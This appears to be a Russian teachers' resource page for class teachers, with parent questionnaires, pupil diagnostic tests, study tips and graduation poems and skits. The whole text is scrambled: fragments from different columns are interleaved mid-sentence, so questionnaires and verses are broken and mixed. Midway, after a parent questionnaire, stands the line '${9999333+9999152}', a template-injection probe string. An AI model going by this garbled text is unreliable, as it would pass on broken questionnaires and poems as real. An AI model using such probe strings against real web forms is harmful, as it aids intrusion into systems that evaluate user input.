"Методическое путешествие"Унесите с собой, унесите с собой!!!
особое удовольствие:• состоятельной;
по определенным вопросам
Деловая методическая игра
– Получаете ли вы вашу семью?
– Прояснение мнений родителей
353.5 KB
этой памятной встречи
свободную тему?
10. Как вы находите
своих детей.
Microsoft Word Document
Хоть немного тепла
18. Писать сочинения на
семейный бюджет?
о своих детях. Анкетирование позволяет узнать, какими родители видят
54.5 KBОтзвенела гитара, и балу - отбой!
17. Заниматься в изостудии, изокружке?
плата и совместный
с представлениями родителей
Microsoft Word Document
вновь опускается вечер,
искусстве?9. Устраивает ли заработная
детях, их интересах, увлечениях, а также знакомство
тему Роль классн
А над городом
что-то новое об т. д.
– Сбор сведений о
Педагогический совет на было настоящее счастье.
16. Читать или узнавать
• работают из-за квартиры и руководителя и т.д.личности каждого ученика"
Чтоб у каждого проблемах?
• некуда деваться, работают из-за зарплаты;себе работу классного
влияние на формирование Поменьше ненастья,
разбираться в их
• недовольны;актуальными, как они представляют
коллектива и его широкой дороги,
15. Помогать другим людям • довольны;родители считают наиболее
в становлении классного Пожелаем Вас всем
самодеятельности?своей работой, своей специальностью?
и их тематики. Например, анкетирование позволяет понять, какие трудности детей тему: "Роль классного руководителя
Пожелание
14. Участвовать в художественной 8. Довольны ли они
классного руководителя, предпочитаемых форм работы
Педагогический совет на прозвучал.
открытиях и изобретениях?• равнодушны.и содержания работы
32.0 KBЧтобы звонок последний
13. Читать об известных • не доверяют;относительно общей организации
Microsoft Word Document
мгновения важнее,
математические задачи?
• доверяют;– Выяснение ожиданий родителей Методика проведения актив. форм восп..do
И нет сейчас 12. Помогать ребятам решать школе и педколлективу?
реализации следующих целей:деятельности.
прощания настал,дела?
7. Как, по-вашему, они относятся к
классному руководителю в видов коллективной творческой
И вот момент
себя обязанности организатора
• в проведении ремонта.Анкеты могут помочь
форм воспитания и
стал виднее,
11. Добровольно брать на • в проведении экскурсий, походов;
руководителя проблеме.Методика проведения активных
Итог работы нашей спортшколе, секции?
дел;по интересующей классного
26.0 KBА главное, себя не потерять.
физкультуры или в • в организации классных
• обеспечивает конкретную информацию Microsoft Word Document
так работалось, как пелось,
10. Заниматься на уроках школе, классному руководителю?
классом или школой;
Как составить справку.docЧтоб в жизни
сейчас:
6. Помогают ли они от целей, стоящих перед конкретным
Школьный документ - справка.школе сдать,
– Нравится ли вам • больше мать.
составлена в зависимости
23.5 KB
Экзамены успешно в
сказки или истории?
• больше отец;
• обладает высокой вариативностью: она может быть
Microsoft Word Document будет так, как вам хотелось,
9. Слушать или сочинять
• только по вызову;
обработке;
Заповеди классного руководителя.docИ пусть все
8. Рисовать или наблюдать, как рисуют другие?• редко;
в проведении и
Заповеди классного руководителяНеобходимо жизни пожелать.
нее?
• часто;• она достаточно компактна
22.5 KB
И юношам, и девушкам прекрасной
ритмично танцевать под
школу?преимуществ:
Microsoft Word Document нами результат.
7. Слушать музыку и 5. Посещают ли они
Анкета обладает рядом Анкетный опрос родителей.doc
Ведь налицо пред или задавать вопросы?
• больше отец.следующих собраниях (возможно, с привлечением психолога).
году
о прожитом напрасно?
6. Разговаривать с незнакомыми • больше мать;
тематические выступления на
собрании в учебном
Но что грустить петь песни?
• оба;
получить. Это поможет спланировать
на первом родительском ни пера.
5. Читать стихи или
• иногда;они хотели бы
Анкетный опрос родителей
жизни вам и 4. Ломать игрушки, чтобы посмотреть, что внутри?
• всегда;
данной теме, ответы на которые предложения.
Ни пуха в 3. Играть в шашки, шахматы?
классе?сформулировать вопросы по
10. Ваши пожелания и
путь, и пожелаемверховодить в них?
с товарищами в в письменном виде
с коллегами?Так в добрый
2. Придумывать игры и родители вашими отношениями
можно попросить родителей могли бы поделиться
Промчалась школьная пора.
подвижные игры?4. Интересуются ли ваши
рекомендациями. По завершении сообщения 9. Каким опытом Вы
мы поздравляем,1. Подолгу играть в
• больше мать.
было кратким (10–15 минут) и завершалось практическими Вас радуют?
Вас от души
вы очень любили:• больше отец;
Важно, чтобы данное выступление ребят больше всего
вспять.– Верно ли, что в детстве
• оба;экзамену и т.д.
8. Какие качества поведения, черты характера Ваших Их школьный день, не повернуть все
Контрольный лист
• никогда;домашних заданий, по подготовке к
Вас огорчают?
Для них настал, действительно, последний«+», если ответ положительный, и знак «–» при отрицательном ответе.
• иногда;
рекомендации по подготовке
ребят больше всего нам опять.
они вписывали знак
• всегда;учении. Это могут быть
7. Какие качества поведения, черты характера Ваших Своих питомцев видеть
с номерами вопросов, рядом с которыми делами?
3. Помощь ребенку в
классом?день весенний,
разграфленные контрольные листы
родители вашими учебными этих трудностей.
Вашей работе с
зале в этот Школьникам были выданы
3. Интересуются ли ваши
столкнуться дети, и способы профилактики
всего удается в
Как грустно в «СПОСОБНОСТИ ШКОЛЬНИКА»
тогда чувствовали?
трудности, с которыми могут
6. Что Вам лучше Слова учителя
ДИАГНОСТИЧЕСКИЙ ТЕСТ
и что вы
полезно рассмотреть возможные их причину?
Самим собой!новые идеи, интересные дела, привлекательные перспективы.
из дома надолго обучения (5-й или 9-й класс). В этом случае
Вы сталкиваетесь, работая с классом? В чем видите
Огромного, святого недовольствавнести в нее
2. Уезжали ли вы на новый этап
5. С какими трудностями живой
жизнь, стремясь сразу же
вашей семье?2. Новые школьные требования. Это особенно важно, если дети переходят
– в другом (укажите, в чем именно)_____________________.
тебе горит огонь
включиться в классную
ней что-то свойственное только
1. Особенности возрастного периода: младшего школьного, подросткового и т.д.
родителями, учителями, общественными организациями;сначала начинай!
определить свою позицию, выбрать тон и свой дом, домашнюю атмосферу, есть ли в
Но пусть в Дорогой выпускник!не отдам
Сколько в сердце
И блеском призрачных
лжи,
Ни о чем Как мне нужен круг друзей
пока –и ансамбль)
И в сердце
не скажет,А вот придут
Медали свои золотые.И без меня
Родителей доставали?
вашиРазве не вашей
Сколько вы сил Послушала всех их ни нового корыта,
Классные мамы на Попалась Рыбка Золотая
В другой раз в синее море
Может, хочу слишком много, –
поступят
сдали!взмолился:
Рыбка!думу:
то, что поймаютИ днем, и позднею ночью.
общие.
И два еще О Золотой рыбке.
(Сказка классных руководителей)И навряд ли
И не будет Теле-, видеобум, информационная масса,
говорим мы "спасибо" особо,дорог,
Заносчивость, лень и безграмотность, жуткий ответ,
быстро порою,мамой второю,
него душа.
Чтоб поделиться им к нему кнут.
Ну как детьми-то управлять?Бог.
это
Ангел. Бог. Черт.
создадим.
И про вампиров Пусть деткам песенки
Пусть будет школа
Черт. ( под музыку лепят)
Лепите, поспешайте!работа.
маму классную слепить!Рядом с ним
добрыми лучистыми глазами.
и за детьми Перед ширмой сидит
Сценка "Божественная комедия".Настал черед последнего,
И верим, что экзаменыПрилетайте, чайки и орлы!
не забывайте,Неба не пугайтесь порога
Вам открыты все
Вашу жизнь пусть
и успех!Чтоб не знали
сильнее быть.Привела бы вас и любви.
вернуться...
От вздорной мысли А вдруг получится
не хватить,
Вы ведь умеете, я знаю!
Не торопитесь отвергать,
Постойте у открытой Каждый класс, как дом родной...
этот час
Кто из трубочек
Как не вспомнить учеба?
Как бы строем нашим деткам
На глазах они
Жил одиннадцатый класс.Выступление учителей
послушных,Оплачен хорошо Ваш
Невзгоды мимо Вас
это.ответы.
советы!Вам и огромная
поздравить,детям в Жизнь
Уважаемые классные руководители!
Смелее по земле станет.
Любовь пусть в Не предавать друзей
Мама С добром Уметь любить, страдать, мечтать,
будет строг,Из множества земных
В большую жизнь
сердце. Огромное родительское спасибо
Мама. Мы - счастливые родители, дорогие наши дети, и сегодня мы Желаю счастья всем, здоровья.
В тебя я Мой уходящий выпускной Чтоб вы творили
мир станет добрее,
Надеяться на вас ждет?
Дорогие мои взрослые
3П — Пометь карандашом самые
Перескажи текст, опираясь на эту с последующим ключевым
Школа классного руководителя
ключевых слова с слову поставь вопрос, который позволит понять, как оно связано
После выбора ключевых
способствовать воспроизведение соответствующего нашими переживаниями (и приятными, и неприятными).
—то, что мы можем
—то, чем постоянно пользуемся;
22. Проверяй себя.самом важном в
20. Попробуй использовать при к докладам, сочинениям, творческим работам на узнаешь, с тем, что ты уже о ком говорится
правила, на которые оно
выполнения следующего, и т.п.(учебник, тетради, карты, карандаши, словари, справочники и т.п.).
предметам и прикинь, сколько времени тебе 9. Приступая к выполнению приемов, средств) это можно сделать.
каждого задания, думай не только
есть компьютер, научись с его 4. Научись пользоваться словарями
Памятка для учащихсяученика.doc
Microsoft Word Document сидеть правильно.doc
по ТБ.docповедения в конфликте.do
Microsoft Word Document Таблицы по здоровому
Классный час по
Детского фонда ООН на основе телвизионных
общественного мнения о оканчанию учебн
подготовке родительских собраний ребенка.работе с классом, а также определить
Подобная предварительная диагностика
(я знал, что так и собственным опытом школьной
во многом может будут искать подобный
Если родители, отвечая на предложенные
чувствовал себя в школьной жизни - это...
ПАМЯТКИ КЛАССНЫМ РУКОВОДИТЕЛЯМ
• Мне нравилось, когда учитель ...
• Мой классный руководитель • Мои школьные воспоминания
методика неоконченных предложений, которая поможет определить хотели бы активно
• Каковы особенности характера
заниматься в школе ним посещать школу?
• Каким школьником ему
ребенка отношения в
• Фамилия, имя отчество.семьи.
• Возраст обоих родителей.коллектива.в сотрудничестве со
до того, как дети сядут
какой-то определенной проблеме.Диагностику можно использовать – интересная, захватывающая, но отнимающая много дать понять родителям, не обеспечивающим надлежащего
первого дня работы коллективе.такого ребенка с
очень трудным.работу с семьей, в которой растут
в семье, потеря родителей или воспитания. К таким проблемным Главным назначением коррекционной руководителем.целью навешивание ярлыков.
коррекционные действия классного • Если родители поделились Используя диагностику, классный руководитель должен восприятия всеми родителями и сказали ему
учебного года; по результатам участия у учащихся друг в конфликтной ситуации
консультацийПредварительная диагностика необходима семья, дает возможность классному применения.классного руководителя с конструктивно спланировать воспитательную
коллективу педагогов школы.выходного дня.со школьной книгой учебнику».
• Экскурсия – знакомство со школой всех внеклассных мероприятиях.
учебное время.
воспитательной работы, создаю условия для стать активными участниками работы с детским
Уставом учебного заведения, с правилами поведения учащихся с теми знакомить родителей класса 2. Формирование у родителей
• Конфликты в семье • Как научить ребенка • Связь поколений и • Здоровье ребенка – основа успешности в ребенке ответственность за старших и младших
моему ребенку?детей.• Праздники в доме. Какими им быть?
• Книга в жизни в жизни ребенка • Что делать, если ребенок говорит
• Игра и игрушка с младшим школьником.их просвещения.психолого-педагогическое просвещение родителей и педагогикинаправлениям.для нормальной жизни
становиться хорошими родителями. Роль классного руководителя трудности самого ребенка, а из-за противоречий во вызывает оно и Педагоги, работающие с младшими работе с родителями учащихся
мягкая, добрая – злая, справедливая – нечестная._____________________________________________________вопросам обучения и
разобраться детям в Дает ли учитель _____________________________________________________ Обращает ли внимание Помогает ли учитель
___________________________________________________________________
• справедливая – нечестная.
твоему учителю:
ссоре с одноклассниками? _______________________________________________________________ Разъясняет ли учитель, как готовить домашние вести себя так, чтобы получить одобрение _______________________________________________________
Интересно ли тебе –хотели бы, чтобы их дети их детям. Помогает им в 100 процентная удовлетворенность Отсюда следует, что отношение родителей
ребенку в его -+++
++++
заботливая – невнимательная,++
воспитания вашего ребенка?_разобраться детям в театр, на экскурсии?вашего ребенка и справляться с трудностями, возникающими у вашего
ЮЭ
МА№
Отношение к классу авторитетом, водит в театры высоко оценивают личностные
в твоем классе?++
+++++
++
+мнению, подходят к твоемув ссоре с учитель в театр, на экскурсии?к учителю, если тебе что-то непонятно?
Интересно ли тебе КИ
АРкласса и их надомное обучение с выход из сложившейся защитить учителя от
следующем примере. В опрошенном мною
к учителю как позитивности отношения учащихся
запросу директора школы.степени позитивности отношения
на этой стрнице.И снова все
Припев.
Но никому я Время, словно карусель.может,
Против зависти и Что задумано, успеть,Все больше понимаю,В свой сердечный
Он не закончился (Исполняют классные руководители Терпения наберитесь
Сейчас вам никто вы их учили.получат
никак неймется?!вашиРазве уста не
Каждый дневник исписан?их учили?
Наши заветные желания!»Не надо нам Бухнулись перед неюВ третий раз, наконец-то,
одною тиной.
И вот они Смилуйся, государыня!
Пусть наши дети
Чтобы ЕГЭ все
А я бы Я сказала бы:
И каждый думает
В надежде на
болелаА вот заботы
мамыСтарую, мудрую сказкуРЫБКЕподскажет, никто не обучит,
один перед классом.
Спецэффектная жизнь жизнь, технологий обвал,Но классным своим
И каждый учитель, конечно, нам стал уже нас было: взаимные ссоры, обиды,Но время идет, и бежит очень Давно мы сроднились, вы стали нам Пусть вселится в ,
А я добавлю Ангел.
быстро все слепили,И подбросим в
Добавим обязательно.Пусть будет обаятельной.
Пусть спортом увлекается.Гибкий стан ей
Черт. Ангел.
Бог. классных руководителей)
Приступим, помогайте!охота!
Вас уж ждет подсобить:
остатка.Это мама с
Чтобы классною была
классные руководители, ангел и черт.К Последнему звонку
Проходит и кончается,случается.
Прилетайте в гости, прилетайте,Гнезд своих родных сами,
Только тайну отчего Классные руководители.
Красота, добро, надежда, радость, вера и любовьвечно были счастье
освещает путеводная звезда!быть мудрее и жизничуть побольше счастья
Как нелегко назад забыть,
Найдите миг остановиться,Тепла вам может
Сумейте просто промолчать,Тех, кто вас любит, кто вам верит.
Не торопитесь уходить!Здесь вас любят.
Пожелать вам в В доску глядя, что есть мочи,
Глянешь – сердце защимит.И какая тут
В голове – одни мечты!
А теперь мы нас.
этой крышейвсе Ваши труды!Учеников пытливых и
полон,желаем вам здоровья,
Спасибо классные за На все были
За строгость, и за дельные
За это честь
хотим мы вас Вы дали нашим
вспоминать.
пожелатьИ чуждою жестокость
Красивые мелодии, которые пригодятся при проведении мероприятий, составления презентаций
без них.
хранить,
зло не отвечать.лучшее познать.
Пусть этот выбор
ним вперед идти.
сейчас, поверь,знания, но и свое
родителей
я,
Задорный, юный, озорной,сопровождали.
хотелось,
Что с вами
к вам придет.В большую жизнь. А что вней
классных руководителейвопросы
выучить.
своим разделом текста и Соедини два соседних
К каждому ключевому
одно-два ключевых слова.
Ключевое слово должно —то, что связано с
—то, что нам нужно;запоминаем:
ответа.сосредоточить внимание на
умеешь пользоваться картами, схемами, таблицами, тем выше будет
18. Не оставляй подготовку
нового понятия, явления, о котором ты вопросы: о чем или
письменные задания, пойми и выучи
приготовь то, что нужно для выполнения первого задания
заданий по отдельным
к одноклассникам.том, как (с помощью каких
7. Приступая к выполнению
5. Если у тебя или с чем-то не согласен.
задания
Отчёт о поведении О режиме дня.doc
На стенд Учись
На стенд Памятки На стенд Кодекс
образу жизни.doc
67.0 KBКлассный час (детям будет интересно)
на сайте Представительства
родителями и учащимися целью формирования позитивного
Если вы опасаетесь, что вызывает ваши опасения?
Классный час посвященный
классный руководитель при
школе и своего
и опорой в с классным коллективом.
напряженность родительских ожиданий
родителей, которые обусловлены их
провоцировать его. Поэтому классный руководитель
сказать, что невольно они
годы пережил...
• Я хочу, чтобы мой ребенок
• Самое яркое событие
были ...
...
учебное заведение.
в анкетировании родителей. Достаточно информативной является
своего ребенка вы
для вашего ребенка?
увлекается, чем хотел бы
будет вместе с
с болезнями?
посещал детский сад, как складывались у
Анкета №2. Экспресс-портрет будущего первоклассника.
• Количественный состав членов
• Образование родителей.
Анкета №1. Экспресс-прогноз состава родительского
${9999333+9999152}
школе, степень заинтересованности родителей
и детей задолго
проведенной работы по
Приложение №1. Предварительная диагностика
Работа классного руководителя
и сразу же
и неблагополучные семьи. Классный руководитель с
положение в детском
таланта и способностей
обычном классе бывает
быть направлена на детей, нестабильность положения ребенка
проблемных ситуаций семейного
коррекционная работа
общению с классным
должно ставить своей
• Диагностика проблемы предполагает
определенными правилами.
и учащимися.
мероприятие через призму
работу классного руководителя проводить в конце ситуаций, которые могут возникнуть Оперативная диагностика необходима
• тематических и индивидуальных
семье чрезвычайно трудное.
Архив
ситуации в отдельных тех ситуаций, которые требуют ее
Организация, темы и формы
Диагностика в работе Без использования психолого-педагогической диагностики невозможно в классе» – демонстрация достижений учащихся, родителей и педагога • Заседание выездного клуба • Знакомство родителей учащихся • Круглый стол «Путешествие по школьному образовательному пространству школыродителей класса во в каникулярное и знакомлю с планом даю возможность родителям своих учеников, с первых дней пребывания в ней. В первую очередь, это знакомство с Знакомлю родителей своих
классный руководитель должен стоит?слабо…работать дома?• Если ребенок одинок…ребенка в семье.• Как воспитать в • Дружба в жизни • Компьютер – друг или враг о половом созревании маленьких.нравственности.• Средства массовой информации учиться.в жизни школьника.• Основы построения общения выборе тем для Для того чтобы
Мини-мониторинг
по вопросам психологии осуществляю по следующим в создании условий Родителям необходимо помогать из-за так называемой учебы в школе. Не меньше волнений сотрудничества.Огромное значение в Обработка данных анкет чуткая – равнодушная, заботливая – невнимательная, строгая –другого учителя?
с учителем по
Помогает ли учитель _____________________________________________________в своей работе?
__________________________________________________________________________________________________________
Анкета для родителей• добрая – злая,мнению подходят к
учитель разобраться в учитель в театр, на экскурсии? _______________________________________________________________
Стараешься ли ты учитель, если ты что-то не понял?Возраст ________________в целом (вопрос № 10) также очень позитивное родителей учеников не индивидуальный подход к качества педагога – чуткость, заботливость, мягкость, доброту и справедливость. У них высокая данной группеНравится ли вашему +
+-
+--++
– Подсчитайте количество голосов +-чуткая – равнодушная
слова, которые по вашему
вопросам обучения и Помогает ли учитель ваших детей в учитель на особенности Помогает ли учитель ШМГН3 А класса
другого учителя.в случае затруднений, является для них очень хорошее. Также дети очень Нравится ли тебе -справедливая – нечестная.++++++++Подчеркни те слова, которые, по- твоемуучитель разобраться в Водит ли вас Обращаешься ли ты
Темы собрания
ЮЭМА№учащихся 3 А особого личностного склада, был направлен на участникам конфликта, а также найти непрофессионализме. Данное обследование помогло наглядно демонстрируется на степень позитивности отношения помогло выяснить степень родителей учащихся, была создана по
Анкета для выявления Спасибо еще раз. Ваше имя появится
Дерзай! Работай! Ошибайся! Падай!
отдам!сожалений!тревожитЗакружить легко нас И терпенья одолжиО боже, дай мне сил,дней
Грустной музыкой звонка…проплывает,«Молитва»с богом,словом,
Не зря же И без меня Что ж вам Разве звонки не проложен?рукою«Сколько вы лет исполнить«Государыня Рыбка!«Чего вам надобно, люди?»травою морскою.
Анкетирование родителей
Пришел он с добрым словом!
бы Рыбку:Государыня Рыбка!Сделай такое чудо,
Свои подтвердили медали!Какое желанье исполнить?синему морю,Чтобы забросить невод
У них голова были разные –Жили две классных
сказку –СКАЗКА О ЗОЛОТОЙ И никто не
при всем ты о нас.сердце у нас,И мы понимаем: труднее профессии нет.И все у бы на день.нас получились.всех хватило.дам такое сердце
Черт. Дать ей позабыли.Ну, слава Богу, молодцы -Черт. Немного чертовщинки
Ангел. Ангел.Бог. играет.работе.ноги)
Как составить анкету
руки и головы войдет.Мне чудо сотворить ангел и черт)Что ж придется Это сердце, отданное детям без
Справочная. Чтоб женщиной была, наукой чтоб владела,
За ширмой сидят Последнего звонка!И детская, и вольная,А все конец жизни веселы,Чайками, девчонки, будьте вы!Звезды доставать учитесь и решить,и вновь.всех.В семьях чтобы Светлый путь пусть Дай вам Боже Чтоб дорога вашей Дай вам Боже возвратить,Не торопитесь все Не торопитесь успевать.отвергая,Достаньте мудрости печать,
легкостью забытьВыступление классных руководителей.Здесь вас помнят,
мы, ребята,столько воевал!Губки, щечки, глазки в краске.
красоты!нам девчонок –каждым днем,
Становился он у Целый год под Пусть высоко оценят
творчества желаем!Вас пусть будет Мы все родители Дарили мудрость детям, а родителям терпенье
Оценки, шалости –уважаем,Вы искренни, ответственны, надежны
Каким образом провести обработку анкет
Сегодня от души больших!И добрым словом Еще хотим мы покинет,в жизни нам Обиду долго не И злом на Все в жизни
поспеши.И вам по Папа Перед тобой
не только свои Пожелания детям от Вас поздравляю нынче ценитель,В делах всегда Хочу, чтоб вам дерзать мысль такую,И пусть удача проважаемПожелания детям от 2П — Придумай к нему
и постарайся ее ключевого слова со
понять эту взаимосвязь.выполнения задания.Читая абзац, выбери для него каждом абзаце.умениями;(прерванные действия);Помни: мы лучше всего 21. Составляй план устного США, такой метод позволяет
Способы завершения собрания
заранее, на протяжении нескольких дней, распределяя нагрузку равномерно.не случайные, внешние связи, а главные связи, связи по смыслу.16. Ищи связь каждого учебника задавай себе 14. Прежде чем выполнять уроку, все убери и
все лишнее—то, что может отвлекать. Приготовь то, что нужно для
10. Продумай последовательность выполнения ко взрослым или содержании задания), но и о таблиц и т.п.и объяснения, правила, формулы в справочниках.2. Задавай вопросы, если чего-то не понял Как готовить домашние ученикаО режиме дняУчись сидеть правильноПамятки по ТБ
конфликтеТаблицы по здоровому Microsoft Word Document имена21 фильма размещен организовать работу с Классные руководители 1-11 классов с
окончанию учебного годак того, что может использовать собственной адаптации к увидеть родителей, которые будут поддержкой самом начале работы классному руководителю снять к школе отдельных
и даже иногда жизни, можно с уверенностью
в свои школьные
Скачать:
о ... | • Я радовался, если ... |
---|---|
• Мои школьные результаты |
всегда чувствовал себя
собственного ребенка в
заключаться не только • Какие качества характера семьи наиболее авторитетен
• Чем интересуется и
друзей и приятелей
и как справляется • С какого времени
• Интересы, увлечения, хобби семьи.
семья.• Профессии обоих родителей.
класса.
увидеть отношение к изучения коллектива родителей
родителями и после
и конструктивнее. Успехов Вам, коллеги!них не будет.
семьи его учеников
меньшей степени нуждаются спокойствие и комфортное для максимального развития
такого ребенка в
классного руководителя должна школьному обучению, ранее половое созревание
поддержки в решении
семьей учащихся является располагать к дальнейшему • Диагностическое исследование не
стать доступной всем.
исследовании и руководствоваться работы с семьей
того, чтобы увидеть проводимое
только для того, чтобы родители отметили
Итоговую диагностику уместно
собеседованиям, в решении проблемных
экскурсий.
• родительских собраний
родителями тех учеников, положение которых в
По теме: методические разработки, презентации и конспекты
помогает выявить проблемные в зависимости от коллективом родителей.
и детей.• «День открытых дверей родительских уроков.«Новости школьных уроков».
• Встреча родителей «Традиции класса, которым быть».формирования культуры принадлежности уделяю участию самих в классе мероприятий в каждой четверти детского коллектива и
разочаровываться в родителях с первых дней школа.В начальной школе • Страхи ребенка. Что за этим
• Если ребенок успевает • Школьный учебник. Как с ним семьи.• Права и обязанности друзьями и приятелями.детьми в семье.
детей?
• Что надо знать семье – пример подражания для семьи в воспитании ленью?• Как научить ребенка • Значение режима дня
• Психология младшего школьника.
Пожелания классному руководителю анкета
пожелания родителей при
Скачать:
направление: врачей, юристов, психологов, учителей-предметников. | родителей является просвещение |
---|---|
доме «школа-семья». Это взаимодействие я |
семьи и школы
педагогов и родителей.
школе вовсе не маленького школьника начало четко организованная система началоклассе?вашему учителю: Хотели бы вы Советуетесь ли вы _____________________________________________________театр, на экскурсии?учитывает ли их урока?ребенок в школе?_______________________________________________________________
• строгая - мягкая, Подчеркни те слова, которые по твоему Помогает ли тебе
Водит ли вас ______________________________________________________________ Помогает ли тебе
__________ Школа _________ Отношение к классу и на экскурсии. Поэтому 100 процентов
единодушно отмечают, что педагог осуществляет
высоко оценивают личностные
Анализ результатов по +-
справедливая – нечестная.+
+
++
+
+
++ По поддчеркните те с учителем по
7. Школьный балл (оценка) на уроке. Всегда ли он приготовлению домашних заданий?_Водит ли учитель
Обращает ли внимание ребенок в школе?ШДГЛ
Таблица № 2. Данные родителей учащихся бы учиться у
на ее уроках, учитель помогает им
к классному руководителю +
+
++добрая – злая
-строгая - мягкая++
++учителя?
Помогает ли тебе учителя?учитель, если ты что-то не понял?ШМ
ГНА класса
к классному руководителю
эмоционально-волевой сферы и
по отношению к родителями ученика, обвинявших учителя в
• оценка за урок Действенность разработанной анкеты
в целом высокую
помощью данной анкеты
параллельная форма для Педагог-психолог Т.А. Огнева (Москва)
оценку. Если хотите, чтобы Ваше имяэто просто.Благополучья собственного рай!Никому я не
От потерь и Покой и сон Время, словно карусель,О, боже, дай мне сил
Припев:В водовороте школьных растает
День над нами
Веру, Любовь и Надежду!»
Теперь же ступайте
Когда-нибудь с добрым
поступят –
Экзамены сдать успешно.
месяц!вещали?К классу маршрут Разве не вашей
И отвечала тихо:
Ты помоги нам
Взмолились классные папы:
человечьим:
Пришел он с
–Пришли они с
А я попросила
пришел с поклоном:
Медалистов нет – и не надо!
Сделай так, чтобы дети
попросит Рыбку,
Идут они к синему морю,
этих тяжкихДети у них
моря
Мы вам расскажем
Человек образованный все-таки лучше. тебя,
И при этом
мы помним, и вы вспоминайте
себя оставляет в
мы мнении едины,встает расставания тень.
грустно расстаться хотя
Классные мамы у
Чтоб его на
А я ей отдать.
талант большойАнгел. Побольше оптимизма.
Черт. влюбляется.
ним.
С охотою читает.
На инструментах пусть
Успехов ей в подходе ( под ширмой появляются Готовы руки, голова ( из-за ширмы появляются
нее от нас я -(из-за ширмы появляются
Бог. жизни самый главный.(звонит) Але, справочная? Что такое классный?
Бог "Небесная канцелярия".
А только предпоследнего
школьная,ни длилось бы,
были дни в
Будьте, парни, гордыми орлами!
переступить.
Надо смело выбрать Мы желаем вновь
школу и нас
Будьте счастливы всегда!
другу быть добрее, научи любить.
Добивайтесь, не сдавайтесь никогда, нигде!тоже, чтоб не подвели!
Классные руководители
Как нелегко все И там, где ждали, появиться.
растаял.Все чувства сразу открывают.Нельзя же с Как всегда, за вас горой!
Вспоминать почаще нас!
И хотели б С кем ты блестит: Всех на конкурс Как не вспомнить И взрослели с все выше, выше что сказать хотим...».Любви, цветов и красоты, | Успехов Вам и Улыбкой мир для старанье и уменье открыто, смело. наполняли знаньями: Поверьте, мы Вас очень дела! Мы знаем, Вы любили их! Он знаний требует |
Учителей не забывать
не обманет. Пускай удача не Ведь трудно в жить, не покидатьот души Одну ты выбрать За ней - нелегкие пути,и директору) | вас к мечте, кто отдал вам путь, мои друзья! От всей души, со всей любовью, Строгий критик и И чтоб азарт, упорство, смелость восторжествует. В душе лелея благославляем. Сегодня мы вас |
4П — Перескажи текст
Метод «5 П» Запиши эту цепочку После соединения каждого текста. Обдумай и постарайся в той последовательности, которая нужна для абзац. Ключевые слова — самые важные в нашими знаниями и надо будет вернуться | получится!лучшему его запоминанию. метод «5П», разработанный американскими психологами. По данным психологов большого количества времени. Готовься к ним уже известным. Следи за тем, чтобы это были говорится. 15. При чтении параграфа перерывы. подготовишься к первому |
каждого задания. Убери со стола
записаны. обращайся за помощью (то есть о с помощью электронных слов, находи нужные факты уроке: внимательно слушай, отвечай на вопросы. 40.5 KB Отчет о поведении 125.0 KB | 25.0 KB21.0 KB Кодекс поведения в (картинки) наши и Что означают наши быть равным".Телевизионный цикл из психофизического развития могут 50.0 KB |
Классный час посвященный методики – лишь малая часть переживать период своей
дней своей работы ситуаций уже в Полученные результаты помогут сформированные стереотипы отношения жизни своего ребенка моменты из школьной • Я не хочу, чтобы мой ребенок мне больно вспоминать • Я обижался, если ... | ...• В классе я школе, учителям и приходу Предварительная диагностика может вашего ребенка? • Кто из членов покупке школьных принадлежностей? • Кто из его • Как часто болеет |
рождения.• Адрес семьи, телефон, телефон экстренной связи, рабочий телефон родителей.
• Полная или неполная родителей учащегося.руководителем, родителями и учащимися будущему классному руководителю класса. Она начинается с родительским собраниям, входе встреч с она становится легче безмятежной жизни у знать, что собой представляют | руководителя в не стороны - сохранить его душевное состоит в том, чтобы создать условия не секрет, что иногда положение Индивидуальная коррекционная работа кризисы адаптации к родителям психолого-педагогической помощи и классного руководителя с проводится корректно и |
проблеме.классным руководителем, она не должна
аспектах всех своих возможность дальнейшего совершенствования учить необходимо), но и для конкурсах и фестивалях. Это необходимо не и учеников.детьми, при подготовке к • организаций поездок и подготовке:линию поведения с | с классным коллективом предварительной, оперативной и итоговой коллективе, наладить работу с газеты силами родителей родительской конференции «Есть проблема – есть решение». • Организация и проведение • Презентация классного журнала • Праздник рождение класса. родителями в рамках |
работы большое внимание по вопросу организации Родительский коллектив класса
с перспективами развития Для того, чтобы позже не к своим ученикам и воспитании учащихся; родители должны знать, какими учителями гордится школьному образовательно-воспитательному пространствупреодоления. самостоятельно? воспитании детей.• Спортивные традиции нашей | поступки?• Взаимоотношения детей с младшими и старшими в воспитании собственных материнства и отцовства. • Взаимоотношения взрослых в • Традиции и обычаи • Как бороться с школьника. |
в школе.школьников.
самих интерес, учитываю предложения и привлекаю специалистов различных классного руководителя и индивидуальности в общем нельзя недооценивать. Смысл педагогического взаимодействия маленького человека у ни секрет, что выражение «трудный ребенок» появляется в начальной может вызвать у заранее продуманная и | родителей учащихсяребенку в его мнению подходят к _____________________________________________________ _____________________________________________________ приготовлению домашних заданий? ваших детей в вашего ребенка и ребенка по ходу |
уровнем знаний, который получает ваш в твоем классе?• заботливая – невнимательная,учителя? _________________________________________________________
_________________________________________________________ ______________________________________________________________к учителю, если тебе что-то не понятно? _______________________________________________________ Фамилия, имя ____________________________________________ Класс учителя. авторитетом, водит в театры в школе. Почти все родители руководителю очень положительное. Также родители очень | Среднее+ + + + добрая – злая, + - + |
+++вашему учителю:другого учителя?
Советуетесь ли вы вам рекомендации по в своей работе? урока?_ уровнем знаний, который получает ваш КА БН –учеников не хотели | отмечают, что им интересно Отсюда следует, что отношение учеников + + + + + + + |
+заботливая – невнимательная+чуткая – равнодушнаяХотел(а) бы ты другого задания?вести себя так, чтобы получить одобрение Помогает ли тебе ШДГЛТаблица № 1. Данные учащихся 3 Результаты анкетирования отношения силу особенностей своей
сделать правильные выводы между учителем и родителей.классному руководителю. Результаты опроса показали их родителей с классному руководителю, а также ее К КЛАССНОМУ РУКОВОДИТЕЛЮСпасибо за Вашу Не так легко, не так все Будь беспокойным! Не считай отрадойНадежду – путь к спасенью, –свежих раногней
Зависти и лжи.
не сожалеть.
круг друзей.Тех, кто дорог, принимаю.Но скоро он Грустной музыкой звонкасвоем храните
Это время покажет.
ли в школуИ без меня
они смогутОстался всего лишь
На классных часах ногою
в них вложили?
Рыбка
Ни дворцов, ни дворянства,колени,
И голосом молвит закинули невод –
Раз закинули невод Чтобы когда-нибудь в школуВ вузы – и лучше бесплатно!
А я бы
Рыбка!Государыня Золотая!
О чем он Они Золотую рыбку.
Пошли они к И от забот классных папы.
